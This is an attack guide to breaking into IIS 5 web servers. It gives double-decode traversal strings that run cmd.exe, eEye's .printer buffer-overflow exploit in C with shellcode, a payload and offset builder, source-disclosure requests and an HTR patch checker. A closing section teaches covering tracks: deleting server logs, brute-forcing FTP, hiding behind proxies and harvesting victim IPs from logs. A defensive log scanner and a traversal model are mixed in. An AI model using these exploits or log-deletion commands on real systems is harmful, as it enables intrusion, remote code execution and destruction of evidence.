This is not an article for a script kiddie. It is a little late, but still applicable today, very applicable. It is intended to be a robust guide to hacking, and to administering, IIS 5 servers. So, without further ado: The Ultimate IIS Guide.
Outline:
I. Introduction
II. Information Gathering
   A. Enumeration
   B. Identify the directory structure
   C. Is it patched or not?
III. Exploits
   A. Double Decode (Superfluous Decode)
   B. .printer ISAPI Buffer Overflow
   C. Source Code Disclosure Exploits
      1. Historical Importance
      2. Impact
      3. New Source Code Disclosure Vulnerabilities
   D. WebDAV Exploit
IV. Covering your Tracks
   A. Where are the Logfiles?
   B. Why can't I delete them now?
   C. How I will delete them later.
Foreword
Know your stuff! Remember that by default every action of yours is logged by IIS 5 and by its FTP server. I am not sure about the SMTP server, but who cares, you can't use VRFY anyway!
Let's say you are hacking a web server and you know it is IIS 5. If the IIS server is running it has a virtual root. By default the virtual root is c:\inetpub\wwwroot. So if you send the request
GET /frick.html HTTP/1.0
IIS checks c:\inetpub\wwwroot for a file named frick.html and, if it exists, sends it. If instead you request the default document with
GET / HTTP/1.0
IIS looks for the default document. On an unchanged installation that is c:\inetpub\wwwroot\iisstart.asp (the "under construction" page). You change the default document list yourself through the IIS configuration dialog (the Default Document tab of the site's properties). If default.htm or default.asp exist in the root they are served instead of iisstart.asp, in the order the Default Document list gives them; on a stock install Default.htm is listed ahead of Default.asp, so check the list rather than assume.
The first thing to check while gathering information about the server is whether the administrator has preserved the default directory structure. A virtual directory is a directory that IIS can serve without it actually living under the virtual root. The virtual directories you should check for first are:
/_vti_bin/
/scripts/
/msadc/
/iissamples/
/_vti_pvt/
/_vti_cnf/
/_private/
"What good does this do?" you might ask. First, it gives you a feel for the directory structure of the machine. Second, if they have failed to patch the machine, you may be able to exploit it with one of the techniques described in this paper. After checking those, try some common directories found on sites that have chosen not to keep the default layout, such as:
/cgi-bin/ /bin/ /admin/ /config/ /asp/
/cfg/ /exe/ /php/ /perl/ /binary/
/src/ /tar/ /include/ /topics/ /pwd/
/private/ /conf/ /logs/ /log/ /audio/
/sound/ /pvt/ /images/ /public/ /home/
/cpp/ /db/ /data/ /news/
But don't let this list limit you. You need to know as much as possible about the system, so use your imagination. Done using your imagination? Ready for the 31337 stuff? Let's begin. If the site shows the default under-construction page, the server was most likely installed by accident and the current user of the machine does not know it is there. It has happened many times, at least five times with people I know. Whether or not it was installed by accident, the known vulnerabilities of a default installation are worthless against a box that has been through Windows Update, which eradicates at least 10 to 20 of the exploits. Also, before you start hacking away at the server, do a port scan if you haven't already and see whether FTP is running; it may come in handy, as discussed later.
The first exploits I will discuss are the Double Decode (sometimes called Superfluous Decode) directory traversal attacks. These are easily exploitable on a default installation of IIS 5.0. Some people think you need a myriad of tools to hack. This is a clean-cut example that proves you can get a command shell armed with only a web browser. Note that the shell runs as the anonymous web account, IUSR_<machinename>, not as SYSTEM, which on a default install is still plenty. To exploit this you must first find a directory with execute permissions. By default those are scripts, iissamples, msadc and _vti_bin. A possible exploit request is "http://55.55.55.55/scripts" followed by an exploit string. I say "an exploit string" because there are many to choose from; some are listed below. All of them execute the DOS command dir, which gives a directory listing:
/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:
/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
I will stop listing exploit strings there for brevity. The way the exploit works is that IIS checks for "/../" (dot-dot-slash) traversal before it has finished decoding the request string, so it never notices that the fully decoded string walks out of the virtual root. An example will help. Let's decode
"/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:".
We know that %35 decodes to "5", so replace every %35 with 5, which gives
"/scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:".
That string contains no "../", so the traversal check passes. When IIS then maps the path to the file system it decodes it a second time, turns the leftover %5c into a backslash (it also turns forward slashes into backslashes), and is left with
"\scripts\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:"
which tells it to hop up four directories from scripts (three would already reach the drive root; the fourth is harmless there) and look at c:\winnt\system32\cmd.exe. Because the request came in through scripts, which has execute permission, IIS runs cmd.exe and passes it whatever follows the "?" as the command line, with "+" standing for a space. The resulting command is "cmd.exe /c dir c:".
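To make the decode-check-decode ordering concrete, here is an added model of the flaw (my code, not IIS's): it runs the traversal check after one round of URL decoding and then, while building the NTFS path, decodes a second time. The virtual root, the execute-enabled directories and the tiny set of "existing files" are assumptions taken from the page; the patched variant is the same function with the second decode removed. The %c0%ae overlong UTF-8 form of the attack is a separate decoder bug and is not modelled here.

```python
import ntpath
from urllib.parse import unquote

# Assumptions for this example: the stock virtual root and execute directories
# named on the page, plus a constructed "filesystem" so the model can answer
# 404 versus executable without touching a real disk.
WEBROOT = r"c:\inetpub\wwwroot"
EXECUTE_DIRS = {"scripts", "msadc", "iissamples", "_vti_bin"}
FILES = {
    r"c:\winnt\system32\cmd.exe",
    r"c:\inetpub\wwwroot\iisstart.asp",
}


def _has_dotdot(path):
    """The traversal check: a literal '..' path component, with either slash."""
    return ".." in path.replace("\\", "/").split("/")


def handle(url, vulnerable=True):
    """Model of how IIS 5 maps a request URL to a file and decides what to do.

    vulnerable=True reproduces the double-decode ordering: decode once, run the
    traversal check, then decode AGAIN when building the file-system path.
    vulnerable=False decodes exactly once, so what was checked is what is used.
    Returns ("denied", None), ("404", path), ("serve", path) or ("exec", cmdline).
    """
    path, _, query = url.partition("?")
    once = unquote(path)                           # %25 -> '%', %35 -> '5', %63 -> 'c'
    if _has_dotdot(once):
        return "denied", None                       # only literal '..' trips the check
    final = unquote(once) if vulnerable else once  # the second decode turns %5c into '\'
    rel = final.lstrip("/").replace("/", "\\")     # IIS maps '/' to '\' on the way to NTFS
    fs_path = ntpath.normpath(ntpath.join(WEBROOT, rel)).lower()
    if fs_path not in FILES:
        return "404", fs_path
    vdir = once.lstrip("/").split("/", 1)[0].lower()
    if vdir in EXECUTE_DIRS and fs_path.endswith(".exe"):
        # the query string becomes the argument list; '+' is a space
        return "exec", ntpath.basename(fs_path) + " " + unquote(query.replace("+", " "))
    return "serve", fs_path


if __name__ == "__main__":
    for u in ["/iisstart.asp",
              "/scripts/../../../../winnt/system32/cmd.exe?/c+dir+c:",
              "/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:",
              "/scripts/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:"]:
        print(f"{u}\n  unpatched: {handle(u)}\n  patched:   {handle(u, vulnerable=False)}")
```

Run stand-alone it prints the four cases side by side: the plain "../" request is denied on both, the encoded forms reach cmd.exe only on the unpatched model, and on the patched model they resolve to a file under wwwroot whose name literally contains "..%5c", which is a 404. Every one of the page's exploit strings collapses to "%5c" after the first decode, which is why they are interchangeable.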
This exploit is limited only by your imagination. You can copy files, delete them, disable logging and even delete old logs with this technique. I have heard that you can upload files with it as well, but I haven't managed that myself. You can make their floppy drive spin and, if there is a disk in it at the time, read files off it easily with the type command. The same goes for a CD-ROM drive; there is probably a way to eject the CD, but I don't know how. More information on this exploit is at the end of the paper.
The next exploit is a close relative of the one the Code Red worm used to squiggle its way across the Internet. Code Red itself hit the Index Server ISAPI extension (the .ida/.idq overflow); the one covered here is the Internet Printing ISAPI extension (.printer), a different buffer overflow that is often lumped together with it. Both were found by eEye (www.eeye.com). Unless you live in front of your old Commodore 64 with no Internet connection (which some of you might, judging from the pictures at neworder) you will know how effective Code Red was. eEye released a simple proof of concept for the .printer bug: it writes a file to the root of the target's C: drive describing how to fix the vulnerability. The exploit consists of a request such as
GET /NULL.printer HTTP/1.0
Host: [420 char buffer]
At the 420-character mark you have overwritten EIP. Then put in your shellcode and own the box. The following proof of concept was provided by www.eeye.com. Note: I have been unable to get their proof of concept to work and will provide another, and references to others, at the end of this paper.
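An added example (not eEye's code) for the request layout just described: how a figure like 420 is confirmed with a cyclic pattern and the EIP value read from a debugger attached to the process hosting msw3prt.dll, and how the Host: header is then laid out with the return address at that offset. The offset comes from the page; the 0xDEADBEEF return address and the INT3 sled in the usage block are placeholders, not working values.

```python
import string
import struct
from itertools import product


def cyclic_pattern(length):
    """Non-repeating 'Aa0Aa1Aa2...' pattern (the classic pattern_create).
    Every 4-byte window is unique within the first 26*26*10*3 = 20280 bytes."""
    out = bytearray()
    for a, b, c in product(string.ascii_uppercase, string.ascii_lowercase, string.digits):
        out += (a + b + c).encode()
        if len(out) >= length:
            return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern, eip_value):
    """Given the EIP the debugger showed at the crash, find where in the
    pattern the saved return address sat. EIP is a little-endian dword, so
    0x41306f41 is the byte sequence b'Ao0A' in memory order."""
    return pattern.find(struct.pack("<I", eip_value))


def host_payload(ret_addr, shellcode, offset=420, filler=b"A"):
    """Body of the Host: header: filler up to the saved return address, the
    4-byte overwrite, then the code the hijacked return lands in."""
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    return filler * offset + struct.pack("<I", ret_addr) + shellcode


def printer_request(host_value):
    """The request from the page. The overflow is in the Host: header value,
    not in the URL, and the resource need not exist (NULL.printer is fine)."""
    return b"GET /NULL.printer HTTP/1.0\r\nHost: " + host_value + b"\r\n\r\n"


if __name__ == "__main__":
    # Step 1: crash the target with a pattern and read EIP in the debugger.
    probe = printer_request(cyclic_pattern(600))
    print(len(probe), "byte probe; EIP seen in the debugger: 0x41306f41 (assumed)")
    # Step 2: feed that EIP back; the page's 420 comes out as the offset.
    print("offset:", pattern_offset(cyclic_pattern(600), 0x41306F41))
    # Step 3: lay out the real thing (placeholders, see the lead-in).
    final = printer_request(host_payload(0xDEADBEEF, b"\xcc" * 16))
    print(len(final), "bytes on the wire")
```

Two things the page glosses over follow directly from this layout: the bytes before and after the return address must survive whatever header parsing the ISAPI does (no CR, LF or NUL), and the return address has to point somewhere that leads back into the header buffer, which is why eEye's code carries a different return address for SP0 and SP1.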
Begin File iishack2000.c
#ifdef _WIN32
#include <windows.h>
#include <winsock.h>
#define snprintf _snprintf
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(void);
unsigned char GetXORValue(char *szBuff, unsigned long filesize);

/* Two payloads: sc[0] for Windows 2000 SP0, sc[1] for SP1. Each is eEye's
 * decoder and shellcode followed by the return-address overwrite and padding,
 * as printed in the original file (the backslashes were lost in extraction
 * and have been restored; the byte counts follow the page's text). */
unsigned char sc[2][315] = {
"\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa"
"\xeb\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76\xf9\x80\xc4\x07\x88\xf6\x30"
"\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4"
"\x17\x8a\x3d\x80\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01\x53\x53\x6b\x03"
"\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50"
"\xfc\x56\x03\x53\xfc\x56\x0b\xfc\xfc\xfc\xfc\xcb\xa5\xeb\x74\x8e\x28\xea\x74\xb8\xb3\xeb\x74\x27\x49\xea"
"\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d\x77\x7b\x77\x03\x6a\x6a\x70\x6b"
"\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71"
"\x6a\x77\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a\x70\x6a\x77\x39\x23"
"\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a\x42\x6c"
"\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x00",

"\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa"
"\xeb\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76\xf9\x80\xc4\x07\x88\xf6\x30"
"\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4"
"\x17\x8a\x3d\x80\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01\x53\x53\x6b\x03"
"\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50"
"\xfc\x56\x03\x53\xfc\x56\x0b\xfc\xfc\xfc\xfc\x50\x33\xeb\x74\xf7\x86\xeb\x74\x2e\xf0\xeb\x74\x4c\x30\xeb"
"\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d\x77\x7b\x77\x03\x6a\x6a\x70\x6b"
"\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71"
"\x6a\x77\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a\x70\x6a\x77\x39\x23"
"\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a\x42\x6c"
"\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x00"
};

int main(int argc, char *argv[])
{
    char request_message[500];
    int X, sock, sp = 0;
    unsigned short serverport = htons(80);
    struct hostent *nametocheck;
    struct sockaddr_in serv_addr;
    struct in_addr attack;
#ifdef _WIN32
    WORD werd;
    WSADATA wsd;
    werd = MAKEWORD(2, 0);
    WSAStartup(werd, &wsd);
#endif
    printf("iishack2000 - Remote .printer overflow in 2k sp0 and sp1\n");
    printf("Vulnerability found by Riley Hassell\n");
    printf("Exploit by Ryan Permeh\n");
    if (argc < 4) usage();

    nametocheck = gethostbyname(argv[1]);
    if (nametocheck == NULL) {
        printf("Couldn't resolve %s\n", argv[1]);
        exit(1);
    }
    memcpy(&attack.s_addr, nametocheck->h_addr_list[0], 4);
    serverport = htons((unsigned short)atoi(argv[2]));
    sp = atoi(argv[3]);
    if (sp != 0 && sp != 1) usage();          /* only two payloads exist */

    printf("Sending string to overflow sp %d for host: %s on port:%d\n",
           sp, inet_ntoa(attack), ntohs(serverport));

    /* The payload rides in the Host: header; that is the buffer msw3prt.dll
     * overruns. The URL itself only has to end in .printer. */
    memset(request_message, 0x00, 500);
    snprintf(request_message, 500, "GET /null.printer HTTP/1.1\r\nHost: %s\r\n\r\n",
             (char *)sc[sp]);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    memset(&serv_addr, 0, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = attack.s_addr;
    serv_addr.sin_port = serverport;
    X = connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
    if (X == 0) {
        send(sock, request_message, strlen(request_message), 0);
        printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",
               inet_ntoa(attack));
        printf("If the file doesn't exist, the server may be patched, or may be a "
               "different service pack (try again with %d as the service pack)\n",
               sp == 0 ? 1 : 0);
    } else {
        printf("Couldn't connect to %s\n", inet_ntoa(attack));
    }
#ifdef _WIN32
    closesocket(sock);
#else
    close(sock);
#endif
    return 0;
}

void usage(void)
{
    printf("Syntax: iishack2000 <host> <port> <service pack: 0 or 1>\n");
    printf("Example: iishack2000 127.0.0.1 80 0\n");
    printf("Example: iishack2000 127.0.0.1 80 1\n");
    exit(1);
}
End of File
End of File
The next series of exploits focuses on script source code disclosure. The first is caused by a sample script that ships with IIS 5.0, codebrws.asp. It was meant to show people how to write simple scripts, and it can also pretty-print existing scripts in nice colours; the trouble is that it opens whatever file is named in the Source query variable and prints it, so it will show you the source of any script it can reach. Two requests that demonstrate this (the second uses %c0%ae, an overlong UTF-8 encoding of ".", to step out of the sample directory, the same trick the Unicode traversal bug relies on):
/iissamples/sdk/asp/docs/codebrws.asp?source=/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp?source=/iissamples/%c0%ae%c0%ae/iisstart.asp
The next vulnerability is relatively new, so I won't pretend to have experience exploiting it. It is called the HTR chunked encoding buffer overflow, and I have a checker for it right here; it tells you whether the server is patched, it does not exploit the bug. The information you need should be in the script. It is in Perl, sorry Windows users; if you use Windows and still want to run it, get Perl from activestate.com.
Begin File HTR_Exploit.pl
#!/usr/bin/perl
########################################################################
# (c) Filip Maertens/CISSP, .HTR Heap Overflow checker.
#
# DISCLAIMER: This tool is only to be used for legitimate purposes only.
#             This is considered as an intrusive, so please adhere to the laws and
#             regulations applicable in your country. Oh, and honey, there is pizza
#             in the fridge...
#
# CREDITS: @stake/KPMG for the advisory
#          Thor Larholm for the patch identification remark
#
########################################################################
use strict;
use warnings;
use Socket;

print "iischeck.pl | Microsoft .HTR Heap Overflow Checker |\n";
print "-----------------------------------------------------------------------\n";

my $host   = defined $ARGV[0] ? $ARGV[0] : "";
# usage is "iischeck [hostname] -method [method]", so the method index is $ARGV[2]
my $method = defined $ARGV[2] ? $ARGV[2] : 0;
my $port   = 80;
my @requestmethod = ("GET", "HEAD", "POST");
my $target;

# Initializing strings & vars
my $patchedstring    = "InsertElementAnchor";
my $nonpatchedstring = "document.write";
my $bogusurl         = "/xxxiischeckxxx";

# Main loop of rotten code
if ($host ne "") {
    $target = inet_aton($host) or die(" -- Error: cannot resolve $host\n");
    print " -- Checking hostname: $host\n";
    my $rawrequest = "$requestmethod[$method] $bogusurl HTTP/1.1\r\n"
                   . "Client-Agent: iischeck.pl\r\nHost: $host\r\nConnection: close\r\n\r\n";
    my @results = sendrequestandgetanswer($rawrequest);
    # Line 49 of the reply (HTTP headers included) is the line of the stock
    # error page that differs between a patched and an unpatched server. This
    # is a fragile fingerprint: a custom error page breaks it.
    my $criticalline = defined $results[49] ? $results[49] : "";
    my $patched;
    if (grep { /^Server:.*IIS/i } @results) {
        SWITCH: {
            if ($criticalline =~ /\Q$nonpatchedstring\E/) { $patched = " -- Status: System vulnerable."; last SWITCH; }
            if ($criticalline =~ /\Q$patchedstring\E/)    { $patched = " -- Status: System MS02-018 patched."; last SWITCH; }
            $patched = " -- Status: Cannot identify patch level";
        }
        print "$patched\n";
    } else {
        print " -- Error: System is not a Windows/IIS host.\n";
    }
} else {
    showusage();
}
exit(0);

#######: Functions used by iischeck.pl :#######
sub showusage
{
    print "Usage: iischeck [hostname] -method [method]\n";
}

sub sendrequestandgetanswer
{
    my ($rawrequest) = @_;
    my @lines = sendrawandgetanswer($rawrequest);
    return @lines;
}

sub sendrawandgetanswer
{
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die(" -- Error in creating socket\n");
    if (connect(S, sockaddr_in($port, $target)))
    {
        my @in = ("");      # empty first element so the line indices match the original
        select(S);
        $| = 1;
        print $pstr;
        select(STDOUT);
        while (my $line = <S>) {   # read the whole reply; Connection: close ends it
            push @in, $line;
        }
        close(S);
        return @in;
    }
    else
    {
        die(" -- Error connecting to: $host\n");
    }
}

sub sendraw
{
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, sockaddr_in($port, $target)))
    {
        select(S);
        $| = 1;
        print $pstr;
        select(STDOUT);
        close(S);
    }
    else
    {
        die("connect problems\n");
    }
}
End of File
Well, I know the last one needs more info, but hey, would it be fun if I spoon-fed y'all all the way? Unlike the others listed, that bug also affects IIS 5.1, the web server that comes with Windows XP Professional.
So you got in? At this point you have (hopefully) found a hole in this IIS server and have exploited it, or are about to. What you do next is up to you. But bear in mind that, by default, all actions on IIS 5 and its FTP server are logged, and that is what the next section is about.
The web server log lives in c:\winnt\system32\logfiles\w3svc1 and the FTP server log in c:\winnt\system32\logfiles\msftpsvc1. They record your IP address and the request you made to the server; by default nothing examines the request to see whether you came through a proxy. The log files are named by date, and IIS starts a new file every day. So, if you did some naughty stuff today, find a proxy, come back tomorrow and run the commands below through the double decode exploit, if it is available. If it is not, because no directory has execute permission, you can brute-force the FTP server (through an FTP proxy too!) and, once you have administrator privileges, delete or modify the logs. Don't forget to save some of them to your own box: you will very often find in them the IPs of machines that fell victim to the Code Red worm, and those are vulnerable to the double decode attack and the ISAPI buffer overflows and are most of the time completely default IIS 5 installations.
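The administrator's side of the above, as an added example that is not from the original article: a scanner that parses an IIS 5 W3C extended log and flags the requests this paper has been describing. The log lines are constructed; the field list is read from the #Fields: header, so the parser follows whatever fields the server was configured to write. IIS writes cs-uri-stem after its own first round of decoding (the familiar ..%5c.. entries of the Nimda era), so the scanner decodes until the string stops changing before it looks for traversal.

```python
from urllib.parse import unquote

# Constructed sample in the W3C Extended format IIS 5 writes to exYYMMDD.log.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-06-01 00:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-06-01 02:14:07 10.0.0.5 GET /iisstart.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5)
2003-06-01 02:15:31 10.0.0.9 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c: 200 -
2003-06-01 02:15:40 10.0.0.9 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+del+c:\winnt\system32\logfiles\w3svc1\ex030601.log 502 -
2003-06-01 02:16:02 10.0.0.9 GET /NULL.printer - 500 -
2003-06-01 02:16:10 10.0.0.9 GET /iissamples/sdk/asp/docs/codebrws.asp Source=/iissamples/sdk/asp/docs/codebrws.asp 200 -
2003-06-01 02:16:15 10.0.0.9 HEAD /xxxiischeckxxx.htr - 404 -
"""


def parse_w3c(text):
    """Turn W3C extended log text into dicts keyed by the names in #Fields:.
    IIS replaces spaces inside a field with '+', so splitting on ' ' is safe."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split(" "))))
    return rows


def full_decode(s, rounds=3):
    """Decode until nothing changes: catches raw, once- and twice-encoded forms."""
    for _ in range(rounds):
        new = unquote(s)
        if new == s:
            break
        s = new
    return s


def classify(row):
    """Names of the rules a log row trips; empty list for benign traffic."""
    stem = full_decode(row.get("cs-uri-stem", "")).lower()
    query = full_decode(row.get("cs-uri-query", "")).lower().replace("+", " ")
    norm = stem.replace("\\", "/")           # IIS treats both slashes alike
    hits = []
    if "/../" in norm or norm.endswith("/.."):
        hits.append("traversal")
    if "cmd.exe" in norm:
        hits.append("cmd.exe")
    if " del " in " " + query or "logfiles" in query:
        hits.append("log-tampering")          # the page's own log-deletion commands
    if norm.endswith(".printer"):
        hits.append("printer-isapi")
    if "codebrws.asp" in norm and "source=" in query:
        hits.append("codebrws-source")
    if norm.endswith(".htr"):
        hits.append("htr-probe")
    return hits


def scan(text):
    """Return (client ip, raw stem, status, rules) for every flagged row."""
    findings = []
    for row in parse_w3c(text):
        hits = classify(row)
        if hits:
            findings.append((row["c-ip"], row["cs-uri-stem"], row.get("sc-status"), hits))
    return findings


if __name__ == "__main__":
    for ip, stem, status, hits in scan(SAMPLE_LOG):
        print(f"{ip:10} {status} {','.join(hits):28} {stem}")
```

The status column matters: IIS 5 answers 502 when a CGI program produced no output, which is exactly what a successful "del" looks like, so a 502 on a cmd.exe line is not a failed attack. Because the file for the current day is held open by inetinfo.exe, the attacker's own deletion request is still in it; ship logs off the box (or to a writable share the web account cannot reach) so the next day's cleanup visit finds nothing to delete.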
Useful Double Decode Commands (the command comes after the exploit string)
By the way, I haven't tested all of these, but I tested as many as I could; the server I was using was shut down while I was testing them. If your browser mangles the backslashes, write them as %5c.
/cmd.exe?/c+dir+c:
/cmd.exe?/c+type+..\..\win.ini (Try different combinations with this one; for some reason c:\path\filename didn't work in my test.)
/cmd.exe?/c+type+..\..\config.sys
/cmd.exe?/c+dir+c:\WinNT\System32\LogFiles
/cmd.exe?/c+del+LogFiles\w3svc1\ex030601.log
or
/cmd.exe?/c+del+c:\WinNT\System32\LogFiles\w3svc1\ex030601.log
The last one is just an example; you will have to find out the actual log file names yourself before you can delete them. Remember, though, that you cannot delete the most recent log file while IIS is holding it open, so if you cannot modify win.ini to get it deleted, you have to come back for it later. And don't forget to search Google for the commands that let you upload files with tftp. I hope this paper has enlightened you in some way about IIS 5. Thank you. If you think this paper could use a little more before being posted, just send it back with comments and I will revise it if needed.
Shoutz: nex(dv2), e-eye, packetstorm, neworder, blacksun, irc.freenode.com, and the box networks
JokerDoom